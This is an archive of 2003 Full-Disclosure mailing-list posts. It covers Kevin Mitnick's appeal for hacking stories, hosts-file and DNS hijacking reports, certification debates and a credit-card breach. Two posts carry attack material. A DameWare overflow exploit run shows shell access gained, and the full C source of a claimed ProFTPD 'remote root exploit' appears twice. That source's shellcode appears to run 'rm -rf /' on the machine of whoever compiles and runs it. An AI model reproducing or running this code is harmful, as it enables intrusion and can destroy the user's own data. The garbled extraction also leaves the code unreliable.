I am offering $500 for the most provocative story that makes it into the
book, and if the person wishes, we can protect their anonymity by the use of
a handle.  All contributors selected for the book, will receive a copy of
both books autographed by the authors.

I should have more information up on FreeKevin.com today, as well as
DefensiveThinking.com.  If someone would like to contact me with a story or
a possible lead on a storyteller, please write to me at
[EMAIL PROTECTED], or call at (310)689-7229.  I would appreciate
any assistance you can offer. 

All my best,

 

Kevin Mitnick

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Adik
Sent: Friday, December 19, 2003 8:38 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server
Overflow Exploit

DameWare Mini Remote Control Server Exploit

C:\xploits\dmwaredmware

...oO DameWare Remote Control Server Overflow Exploit Oo...

-( by Adik netmaniac[at]hotmail.KG )-

 - Versions vulnerable: = DWRCS 3.72.0.0
 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3  WinXP SP1

 Usage: dmware TargetIP TargetPort YourIp YourPort
 eg: dmware 10.0.0.1 6129 10.0.0.2 21


C:\xploits\dmwaredmware 192.168.63.130 6129 192.168.63.1 53

...oO DameWare Remote Control Server Overflow Exploit Oo...

-( by Adik netmaniac[at]hotmail.KG )-

 - Versions vulnerable: = DWRCS 3.72.0.0
 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3  WinXP SP1

[*] Target IP:  192.168.63.130  Port: 6129
[*] Local IP:   192.168.63.1Listening Port: 53

[*] Initializing sockets... [ OK ]
[*] Binding to local port: 53...[ OK ]
[*] Setting up a listener...[ OK ]

 OS Info   : WIN2000 [ver 5.0.2195]
 SP String : Service Pack 3

 EIP: 0x77db912b (advapi32.dll)

[*] Constructing packet for WIN 2000 SP: 3...   [ OK ]
[*] Connecting to 192.168.63.130:6129...[ OK ]
[*] Packet injected!
[*] Connection request accepted: 192.168.63.130:1056
[*] Dropping to shell...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32exit
exit
[x] Connection closed.

C:\xploits\dmware

--
cheerz,

Adik


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

2003-12-19 Thread Kevin Mitnick
The difference is that I'm offer a $500 for the best story of a single hack,
and I'm willing to pay $200 for each story that makes the final draft.

Markoff would not agree to pay one dime.

Cheers,

Kevin Mitnick

Check out http://www.zdnet.com.au for the story


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jelmer
Sent: Friday, December 19, 2003 4:03 PM
To: Kevin Mitnick; 'Adik'; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
Server Overflow Exploit

If this is legit

from a /. interview :

--snip--
John Markoff had first libeled me in his book, Cyperpunk, which he
co-authored with his former wife, Katie Hafner. In and around 1990, Markoff
and Hafner contacted me to request my participation for a book about three
hackers, including myself. In considering their request, I asked about their
budget to compensate me for my time and/or life story rights. Both Markoff
and Hafner were unwilling to compensate me as a source, because it was
unethical. I explained that it was unethical for me to give them my story
for free. We were at an impasse
--snip--

from the site :

--snip--
If your story makes it into the book, you'll receive a free copy of my first
book, The Art of Deception, plus a rare Advanced Reader's Copy of the new
one with your story in it -- both signed by me with a personal inscription
to you in your real name or your handle or pseudonym.
--snip--

Thats definatly more ethical ;)


- Original Message - 
From: Kevin Mitnick [EMAIL PROTECTED]
To: 'Adik' [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Sent: Saturday, December 20, 2003 12:30 AM
Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
Server Overflow Exploit


 Hi all!


 I'm sorry for my absence from the list for the past few months, but I have
 been very busy traveling outside the US, and my mail account was
 experiencing problems.  Now that I am receiving the messages again, I have
 been playing catch up, by reading the old posts.

 I do have some good news, and was hoping that some of you might be able to
 assist me.  I have been commissioned by Wiley  Sons to write a second
book,
 which is tentatively titled, The Art of Intrusion.  This book will
 chronicle detailed accounts of real, untold hacks by the perpetrators who
 did it, and I will provide a security analysis and described how the
attack
 could be mitigated/prevented in today's environment.  I am going to tell
the
 story from the perpetrator's stance, not just from research obtained from
 law enforcement officials and records.

 I am looking for former/retired hackers that would be willing to tell me
the
 details of their sexiest hack.  I am not interested in the run-of-the-mill
 attacks such as, exploiting RPC DCOM, but rather creative ones that
 incorporated technical, physical and/or social engineering aspects.



 I am offering $500 for the most provocative story that makes it into the
 book, and if the person wishes, we can protect their anonymity by the use
of
 a handle.  All contributors selected for the book, will receive a copy of
 both books autographed by the authors.

 I should have more information up on FreeKevin.com today, as well as
 DefensiveThinking.com.  If someone would like to contact me with a story
or
 a possible lead on a storyteller, please write to me at
 [EMAIL PROTECTED], or call at (310)689-7229.  I would appreciate
 any assistance you can offer.

 All my best,



 Kevin Mitnick

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Adik
 Sent: Friday, December 19, 2003 8:38 AM
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server
 Overflow Exploit

 DameWare Mini Remote Control Server Exploit

 C:\xploits\dmwaredmware

 ...oO DameWare Remote Control Server Overflow Exploit Oo...

 -( by Adik netmaniac[at]hotmail.KG )-

  - Versions vulnerable: = DWRCS 3.72.0.0
  - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3  WinXP SP1

  Usage: dmware TargetIP TargetPort YourIp YourPort
  eg: dmware 10.0.0.1 6129 10.0.0.2 21


 C:\xploits\dmwaredmware 192.168.63.130 6129 192.168.63.1 53

 ...oO DameWare Remote Control Server Overflow Exploit Oo...

 -( by Adik netmaniac[at]hotmail.KG )-

  - Versions vulnerable: = DWRCS 3.72.0.0
  - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3  WinXP SP1

 [*] Target IP:  192.168.63.130  Port: 6129
 [*] Local IP:   192.168.63.1Listening Port: 53

 [*] Initializing sockets... [ OK ]
 [*] Binding to local port: 53...[ OK ]
 [*] Setting up a listener...[ OK ]

  OS Info   : WIN2000 [ver 5.0.2195]
  SP String : Service Pack 3

  EIP: 0x77db912b (advapi32.dll)

 [*] Constructing packet for WIN 2000 SP: 3...   [ OK ]
 [*] Connecting to 192.168.63.130:6129...[ OK ]
 [*] Packet injected

[Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit

2003-10-24 Thread Jean-Kevin Grosnakeur
Ladies and gentlemen, here's the source code of the exploit for the latest
release of ProFTPD. This is a Zero-Day private exploit, please DON'T
REDISTRIBUTE. I will not take responsibility for any damages which could
result from the usage of this exploit, use it at your own risk.
--
/*
Example of use:
# gcc exploit.c -o exploit
# ./exploit 192.168.1.1 21
Connected on 192.168.1.1:21
Exploitation in progress...
Exploitation string sent.
Trying to connect, please wait...
Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown
unknown GNU/Linux
uid=0(root) gid=0(root) groupes=0(root)
*/

#include stdio.h
#include stdlib.h
#include sys/socket.h
#include sys/types.h
#include unistd.h
#include netdb.h
#define NOP 0x90
#define RET 0x6675636b
/* x86 bind shellcode */
char sc[]=
\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d
\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41
\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f
\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44
\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24
\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14
\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0
\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80;
unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);
int main(int argc, char *argv[])
 {
  int i, *ret;
  char *string;
  unsigned long addr;
  char buffer[1024];
  int port=21, fd, s;
  struct sockaddr_in addy;

  if(argc  2)
{
 fprintf(stdout, usage: %s host port\n, argv[0]);
 return(0);
}
  else addr=resolve(argv[1]);
  if(argv[2]) port=atoi(argv[2]);
  /* copy the NOPs to the buffer */
  memset(buffer, NOP, 1024);
  /* copy the shellcode to the buffer */
  for(i=0; i  strlen(sc); i++)
buffer[i+700]=sc[i];
  /* copy the return address to the buffer */
  for(i=815; i1003; i+=4)
*((int *)buffer[i]) = RET;
  string = (char *) malloc(strlen(buffer)+20);
  sprintf(string, \x4c\x4f\x56\x45 %s, buffer);
  fd = socket(AF_INET, SOCK_STREAM, 0);
  if(fd  0)
{
 fprintf(stderr, unable to socket()\n);
 return(-1);
}
  addy.sin_family= AF_INET;
  addy.sin_addr.s_addr   = addr;
  addy.sin_port  = htons(port);
  /* connect to remote host */
  if(connect(fd, (struct sockaddr *)addy, sizeof(addy))  0)
{
 fprintf(stderr, unable to connect()\n);
 return(-1);
}
  printf(Connected on %s:%d\n, inet_ntoa(addy.sin_addr), port);
  printf(Exploitation in progress...\n);
  /* send the exploitation string to the host */
  if(s = send(fd, string, sizeof(string), 0)  0)
{
 fprintf(stderr, unable to send()\n);
 return(-1);
}
  close(fd);
  printf(Exploitation string sent.\n);
  free(string);
  /* connect to the bindshell */
  printf(Trying to connect, please wait...\n);
  void(*sleep)()=(void*)sc;sleep(5);
  if(give_me_a_shell(addr)  0)
{
 fprintf(stderr, Sorry, exploit didn't work.\n);
 return(-1);
}
  return(0);
 }
unsigned long resolve(char *sname)
 {
  struct hostent * hip;
  hip = gethostbyname(sname);
  if (!hip)
{
 fprintf(stderr, unable to find %s\n,sname);
 exit(1);
}
  return *(unsigned long *)hip - h_addr;
 }
int give_me_a_shell(unsigned long addr)
 {
  int sock;
  fd_set fds;
  struct sockaddr_in shell;
  unsigned char buf[4096];
  char cmd[]=uname -a  id;
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock  0)
{
 fprintf(stderr, unable to socket()\n);
 return(-1);
}
  shell.sin_family  = AF_INET;
  shell.sin_port= htons(1337);
  shell.sin_addr.s_addr = addr;
  if(connect(sock, (struct sockaddr *)shell, sizeof(struct sockaddr))  0)
{
 fprintf(stderr, unable to connect()\n);
 close(sock);
 return(-1);
}
  send(sock, cmd, strlen(cmd), 0);

  while(1)
{
 FD_ZERO(fds);
 FD_SET(0, fds);
 FD_SET(sock, fds);
 if(select(255, fds, NULL, NULL, NULL) == -1)
   {
fprintf(stderr, unable to select()\n);
close(sock);
return(-1);
   }
  memset(buf, 0, sizeof(buf));
  if(FD_ISSET(sock, fds))
{
 if(recv(sock, buf, sizeof(buf), 0)  0)
   {
fprintf(stderr, unable to recv()\n);
close(sock);
return(-1);
   }
 fprintf(stderr, %s, buf);
}
   if(FD_ISSET(0, fds))
 {
  read(0, buf, sizeof(buf));
  if(!strcmp(buf, quit))
{
 close(sock);
 return(0);
}
  write(sock, buf, strlen(buf));
 }
  }
 }
--

Have fun ! @+

_
MSN Messenger 6  http://g.msn.fr/FR1001/866 : plus de personnalisation, plus 
de fun pour vous et vos amis…

___

[Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit

2003-10-24 Thread Jean-Kevin Grosnakeur
Ladies and gentlemen, here's the source code of the exploit for the latest
release of ProFTPD. This is a Zero-Day private exploit, please DON'T
REDISTRIBUTE. I will not take responsibility for any damages which could
result from the usage of this exploit, use it at your own risk.
--
/*
Example of use:
# gcc exploit.c -o exploit
# ./exploit 192.168.1.1 21
Connected on 192.168.1.1:21
Exploitation in progress...
Exploitation string sent.
Trying to connect, please wait...
Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown
unknown GNU/Linux
uid=0(root) gid=0(root) groupes=0(root)
*/

#include stdio.h
#include stdlib.h
#include sys/socket.h
#include sys/types.h
#include unistd.h
#include netdb.h
#define NOP 0x90
#define RET 0x6675636b
/* x86 bind shellcode */
char sc[]=
\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d
\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41
\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f
\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44
\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24
\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14
\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0
\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80;
unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);
int main(int argc, char *argv[])
 {
  int i, *ret;
  char *string;
  unsigned long addr;
  char buffer[1024];
  int port=21, fd, s;
  struct sockaddr_in addy;

  if(argc  2)
{
 fprintf(stdout, usage: %s host port\n, argv[0]);
 return(0);
}
  else addr=resolve(argv[1]);
  if(argv[2]) port=atoi(argv[2]);
  /* copy the NOPs to the buffer */
  memset(buffer, NOP, 1024);
  /* copy the shellcode to the buffer */
  for(i=0; i  strlen(sc); i++)
buffer[i+700]=sc[i];
  /* copy the return address to the buffer */
  for(i=815; i1003; i+=4)
*((int *)buffer[i]) = RET;
  string = (char *) malloc(strlen(buffer)+20);
  sprintf(string, \x4c\x4f\x56\x45 %s, buffer);
  fd = socket(AF_INET, SOCK_STREAM, 0);
  if(fd  0)
{
 fprintf(stderr, unable to socket()\n);
 return(-1);
}
  addy.sin_family= AF_INET;
  addy.sin_addr.s_addr   = addr;
  addy.sin_port  = htons(port);
  /* connect to remote host */
  if(connect(fd, (struct sockaddr *)addy, sizeof(addy))  0)
{
 fprintf(stderr, unable to connect()\n);
 return(-1);
}
  printf(Connected on %s:%d\n, inet_ntoa(addy.sin_addr), port);
  printf(Exploitation in progress...\n);
  /* send the exploitation string to the host */
  if(s = send(fd, string, sizeof(string), 0)  0)
{
 fprintf(stderr, unable to send()\n);
 return(-1);
}
  close(fd);
  printf(Exploitation string sent.\n);
  free(string);
  /* connect to the bindshell */
  printf(Trying to connect, please wait...\n);
  void(*sleep)()=(void*)sc;sleep(5);
  if(give_me_a_shell(addr)  0)
{
 fprintf(stderr, Sorry, exploit didn't work.\n);
 return(-1);
}
  return(0);
 }
unsigned long resolve(char *sname)
 {
  struct hostent * hip;
  hip = gethostbyname(sname);
  if (!hip)
{
 fprintf(stderr, unable to find %s\n,sname);
 exit(1);
}
  return *(unsigned long *)hip - h_addr;
 }
int give_me_a_shell(unsigned long addr)
 {
  int sock;
  fd_set fds;
  struct sockaddr_in shell;
  unsigned char buf[4096];
  char cmd[]=uname -a  id;
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock  0)
{
 fprintf(stderr, unable to socket()\n);
 return(-1);
}
  shell.sin_family  = AF_INET;
  shell.sin_port= htons(1337);
  shell.sin_addr.s_addr = addr;
  if(connect(sock, (struct sockaddr *)shell, sizeof(struct sockaddr))  0)
{
 fprintf(stderr, unable to connect()\n);
 close(sock);
 return(-1);
}
  send(sock, cmd, strlen(cmd), 0);

  while(1)
{
 FD_ZERO(fds);
 FD_SET(0, fds);
 FD_SET(sock, fds);
 if(select(255, fds, NULL, NULL, NULL) == -1)
   {
fprintf(stderr, unable to select()\n);
close(sock);
return(-1);
   }
  memset(buf, 0, sizeof(buf));
  if(FD_ISSET(sock, fds))
{
 if(recv(sock, buf, sizeof(buf), 0)  0)
   {
fprintf(stderr, unable to recv()\n);
close(sock);
return(-1);
   }
 fprintf(stderr, %s, buf);
}
   if(FD_ISSET(0, fds))
 {
  read(0, buf, sizeof(buf));
  if(!strcmp(buf, quit))
{
 close(sock);
 return(0);
}
  write(sock, buf, strlen(buf));
 }
  }
 }
--

Have fun ! @+

_
Trouvez l'âme soeur sur MSN Rencontres http://g.msn.fr/FR1000/9551
___
Full-Disclosure - We believe in it.
Charter: 

[Full-Disclosure] Windows hosts file changing.

2003-10-22 Thread Kevin Gerry
Does -ANYBODY- know how it occurs?

I've had this happen to a couple boxes of mine now...

New one:
--
127.0.0.1   localhost
66.40.16.131livesexlist.com
66.40.16.131lanasbigboobs.com
66.40.16.131thumbnailpost.com
66.40.16.131adult-series.com
66.40.16.131www.livesexlist.com
66.40.16.131www.lanasbigboobs.com
66.40.16.131www.thumbnailpost.com
66.40.16.131www.adult-series.com
--

Any idea how the search site is replacing that? =/ It's starting to piss me
off =/ I had some custom information in there that's now overwritten (Not
backed up)

Thanks =/

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Application level firewall

2003-10-17 Thread Kevin Currie
Jason Freidman wrote:
Is there any sort of application level firewall for linux?  Something
like Zone alarm where you can trust an application?  I think that
openBSD has something that allows you to choose which system calls a
program can run.
You want systrace, which is the package OpenBSD is using.  It is also available for Linux and Mac OS X.   See here:  http://www.citi.umich.edu/u/provos/systrace/



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Shift key breaks CD copy locks

2003-10-09 Thread Kevin Sullivan
But by ATF standards, the Windows operating system and keyboard would not 
need to be installed on the computer - simply possessing both components 
would be enough to bust you. Of course if you are running Windows 3.11 and 
you lawfully possessed it prior to 1995 you would be grandfathered...


If you wanted to take the ATF's approach, it's not just having a
keyboard that is breaking the law, it's the combination of having a
keyboard AND the Windows operating system installed




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Mystery DNS Changes

2003-10-01 Thread Hansen, Kevin
Title: Mystery DNS Changes





We have seen multiple instances where DHCP enabled workstations have had their DNS reconfigured to point to two of the three addresses listed below. Can anyone else confirm this? Incidents.org is reporting an increase in port 53 traffic over the last two days. Are we looking at the precursor to the next worm?

216.127.92.38
69.57.146.14
69.57.147.175


-KJH



++
Kevin J. Hansen
Architect
Global Network
Thomson Legal  Regulatory
[EMAIL PROTECTED]
651-687-8466
++






RE: [Full-Disclosure] Israeli boffins crack GSM code

2003-09-09 Thread Kevin Spett
More info at Cryptome:

http://cryptome.org/gsm-crack.htm
http://www.k4d4th.org/pub/crypto/cryptome/cryptout.htm#GSM


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Richard Spiers
Sent: Tuesday, September 09, 2003 9:10 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Israeli boffins crack GSM code


Hi guys, anybody got more information on this? Any thoughts?

http://www.theregister.co.uk/content/55/32653.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Israeli boffins crack GSM code

2003-09-09 Thread Kevin Spett
Dude, you've got to find some new people to party with.

 Sorry, which GSM code would this be? Because I distinctly 
 remember being
 at a party years ago where the GSM code (some weak variant of A5) was
 shown to be weak and hackable.  This was back in 1998...

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] eBay Security Contact

2003-05-01 Thread Kevin Spett
I recommend calling support and asking to speak with a supervisor, and then
their supervisor's supervisor, etc. etc.  That's worked well for me at a
number of companies.



Kevin.

- Original Message - 
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Thursday, May 01, 2003 1:25 PM
Subject: [Full-Disclosure] eBay Security Contact


 Hello,

 I'm looking for contact information for the security department (if such a
 thing exists) at eBay.  If anyone has any security contact information
 (specifically, I'm looking for e-mail addresses), or just general
support
 information where I can reach a human -- as such information appears to be
 deeply buried.  I'm really starting to become frustrated by the lack of
 support; everything they have is automated/robotic, and even that doesn't
 really

 
 mail2web - Check your email from the web at
 http://mail2web.com/ .


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Security Certifications

2003-03-10 Thread Kevin Spett
No way... if they were Certified Idiots they'd be easier to identify.



Kevin.

- Original Message -
From: rrm [EMAIL PROTECTED]
To: 'Leo Security' [EMAIL PROTECTED]; 'Rizwan Ali Khan'
[EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Saturday, March 08, 2003 7:45 PM
Subject: RE: [Full-Disclosure] Security Certifications


 We could really do with less certified idiots.

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Leo Security
 Sent: Saturday, March 08, 2003 7:19 PM
 To: Rizwan Ali Khan; [EMAIL PROTECTED];
 [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Security Certifications

 I have checked the content and syllabi of most of the subjects offered
 for these certs and was disappointed. They are a waste of time. My
 advice will be to use your time for the deep study of operating systems.
 That would make you a better security analyst. Most employers have had
 it with certs and do not give much importance to it any more.
 Certifications were hot untill 2000. There value is going downhill since
 then.

 I would only go for certs if my employer requires it and pays me for it.
 I will never like to spend my own money on certs.

 Thats my opinion.

 regards
 Leo

 hellNbak wrote:
  Be sure when filling out the questionaire from ISC2 that you lie if you
  have been a part of any hacking groups or have used a nym.  Honesty
*IS
  NOT* the best policy in this case.
 
  I have a friend in Tokyo who took the lead auditor course and passed the
  test, he said it was horrible and not worth the time or money
 
  On Fri, 7 Mar 2003, Ron DuFresne wrote:
 
 
 Date: Fri, 7 Mar 2003 09:08:21 -0600 (CST)
 From: Ron DuFresne [EMAIL PROTECTED]
 To: Rizwan Ali Khan [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED], [EMAIL PROTECTED],
  [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Security Certifications
 
 
 
 Your quickest bet here is to do a google search on cisa and then on
cissp.
 You'll gt pointers to the governing bodies and such, pointers to lists
of
 pretesting help, local affiliations as well as testing sites in the near
 future and much more in the first 10-20 links google returns.
 
 Thanks,
 
 Ron DuFresne
 
 On Thu, 6 Mar 2003, Rizwan Ali Khan wrote:
 
 
 I have heard of CISA and CISSP as Security
 Certifications, but could someone shed some light and
 give information about the governing bodies of the
 following Certifications, and where to get their
 suggested training material/ books etc.
 
 And if it is possible to give their exams from
 Pakistan?
 
 
 BS7799/ISO7799 lead auditor
 Prince 2
 SSCP
 CISM
 CISMP
 TCSEC
 SCP
 
 
 
 
 
 __
 Do you Yahoo!?
 Yahoo! Tax Center - forms, calculators, tips, more
 http://taxes.yahoo.com/
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 
 
 ~~
 Cutting the space budget really restores my faith in humanity.  It
 eliminates dreams, goals, and ideals and lets us get straight to the
 business of hate, debauchery, and self-annihilation. -- Johnny Hart
  ***testing, only testing, and damn good at it too!***
 
 OK, so you're a Ph.D.  Just don't touch anything.
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 
 
 


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] ./makeunicode2.py release announcement

2003-02-27 Thread Kevin Spett
 Or like a meeting of nuns and hookers to discuss sex.
 
 Georgi

I don't know about you, but I would go see that discussion.



Kevin.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Cryptome Hacked!

2003-02-26 Thread Kevin Spett
 damage its integrity.

 e) How is John Young an extremist?
 Would you describe him as being conservative, or moderate in his approach?
 If not, he is an extremist in my eyes.

Again, you choose to oversimplify things... are conservative, moderate and
extreme the only things that are out there?  When I think of extremists, I
think of people like the Black Panthers, Adolf Hitler, Hamas and Thomas
Jefferson.  John Young runs a website.  He simply isn't in the running for
Extremism.

 Are you trying to imply that John Young is trojaning
 the software that his site (infrequently) distributes?

 Not at all.  I believe that Mr. Young wishes to provide his
 community access to good crypto software.  I also believe
 that he is committed to his cause.  However, I do think that
 those who work for/with No Such Agency would like that.

You think that the NSA is modifying widely distributed crypto software?
Okay, that's possible.  How about some proof?  You can speculate endlessly
on the behaviour of an organization that no one has a lot of information
about.

 Cryptome (note Crypt) does indeed distribute and advocate the
 use of PGP and other encryption and/or privacy enhancing software.
 Given the more-paranoid-than-normal state of most of the cryptome
 visitors (myself included), I would think that quite a high percentage
 of them download and use the software for their own reasons.

You posted a message saying that cryptome had been hacked and that you were
concerned about software that it mirrors might be tampered with not only on
Cryptome but on other sites.  The software that cryptome has is also located
in many, many other places and thus it would be easy to spot differences
between them.  If you want to start asking how do I trust the hashing
tool, how do I trust the crypto algorithm or how do I trust the compiler
that I'm using to build the code that I wrote to implement the algorithm,
you've wandered outside the scope of what most people on this list care to
answer.

 In conclusion, for you to attempt to describe cryptome as if it was
 C-SPAN, or the Library of Congress is incredible.  If you believe that
 the operators of cryptome have good intentions towards the US government,
 than you are also naive.

Cryptome is a site that strongly promotes a very specific agenda which is
often at odds with established public policy and popular opinion.  It also
publishes opinions of dissent that it may not fully support but feel deserve
discussion and exposure.  Neither John Young nor Cryptome are many of the
things that you have described them as.  The purpose of my message was to
point out what I believe were errors in how you portrayed them.


Kevin.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Hackers View Visa/MasterCard Accounts

2003-02-18 Thread Kevin Spett
Here's an excerpt from the posting to net-security.org:

-
The hacker breached the security system of a company that processes credit
card transactions on behalf of merchants, Visa and MasterCard said.
-

Looks like someone just ran off with a database.  I haven't done any math,
but I'd think that brute forcing that many card numbers and expiration dates
would take ages.

Kevin.


- Original Message -
From: Jason Coombs [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, February 18, 2003 4:28 AM
Subject: [Full-Disclosure] Hackers View Visa/MasterCard Accounts


 So, anyone know whether this was a simple real-time credit card
processing
 oracle attack where a tool throws fake orders at sites that provide
 real-time credit card authorizations until a valid card number and
 expiration date are found?

 Any third-grader with a copy of Microsoft .NET or Java 2 class libraries
 could whip up the code needed to bang away at the typical e-commerce site
 logging rejected orders due to invalid credit card payment and revealing
 card numbers and expiration dates that can be used for fraud in a variety
of
 ways.

 There must be such credit card hacking tools circulating for the benefit
 of script kiddies -- anyone looked into this before? If so, will you share
 some references?

 Jason Coombs
 [EMAIL PROTECTED]

 --

 Hackers View Visa/MasterCard Accounts

 Mon February 17, 2003 11:17 PM ET

 NEW YORK (Reuters) - More than five million Visa and MasterCard accounts
 throughout the nation were accessed after the computer system at a third
 party processor was hacked into, according to representatives for the card
 associations.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



Re: [Full-Disclosure] Hackers View Visa/MasterCard Accounts

2003-02-18 Thread Kevin Spett
I heard it was your mom.



Kevin.
- Original Message - 
From: KF [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, February 18, 2003 5:32 AM
Subject: Re: [Full-Disclosure] Hackers View Visa/MasterCard Accounts


 Does anyone know who the third party processor was?
 -KF
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



RE: [Full-Disclosure] Unusual request

2003-02-13 Thread Timm, Kevin
Title: RE: [Full-Disclosure] Unusual request





Unicoder by HDmoore will do a lot of unicode checks , plus it can be used over SSL to evage a NID or through a proxy to obfuscate your ip. I wrote a little add on to it called firerunner that would actually do the exploit and ftp Netcat to the host. After that was finished it would connect back to a Netcat listener with a cmd prompt. The whole process took less than 10 seconds. I tracked down a copy of it. It is kind of old and there are probobaly some coding errors on my part, since it was really just a test and never released. Here it is. Keep in mind it's pretty old but with a little love should be able to demonstrate Unicode attacks and back channel connections as well as the ability to use a proxy. The script allows it to function as such 

Attack from IP 1 (which could be a proxy) 
FTP Netcat from another IP 
Create connection to a 3rd ip 


Good luck. 


Kevin 



-Original Message-
From: Rapaille Max [mailto:[EMAIL PROTECTED]]
Sent: Thursday, February 13, 2003 7:58 AM
To: Schmehl, Paul L; Full-Disclosure
Subject: RE: [Full-Disclosure] Unusual request



Hi,


I did this kind of demo 2-3 times already, with a Win2k SP2 and IIS.
To add a layer, we just added a firewall between the ISS and the attacker PC .. with just Port 80 incoming and, as (too)usual, All port open for outgoing... Just using a unicode exploit, and then loading some tools, defacing web page, taking remote control, etc... A lot of fun for Us, and great astonishment for the public.. Certainly with the firewall.. A lot of them where just saying, before the demo : We are secure, our integrator installed a firewall... 

BTW, we also used some tools ike unicoder.pl and Upload.asp, to demonstrate, in a second time, how easy it is, even if you don't know what you do...

Good effect of awareness for those managers, Engineer, etc...



Good luck.


Max


-Original Message-
From: Schmehl, Paul L [mailto:[EMAIL PROTECTED]] 
Sent: 13 February 2003 14:37
To: Full-Disclosure
Subject: RE: [Full-Disclosure] Unusual request



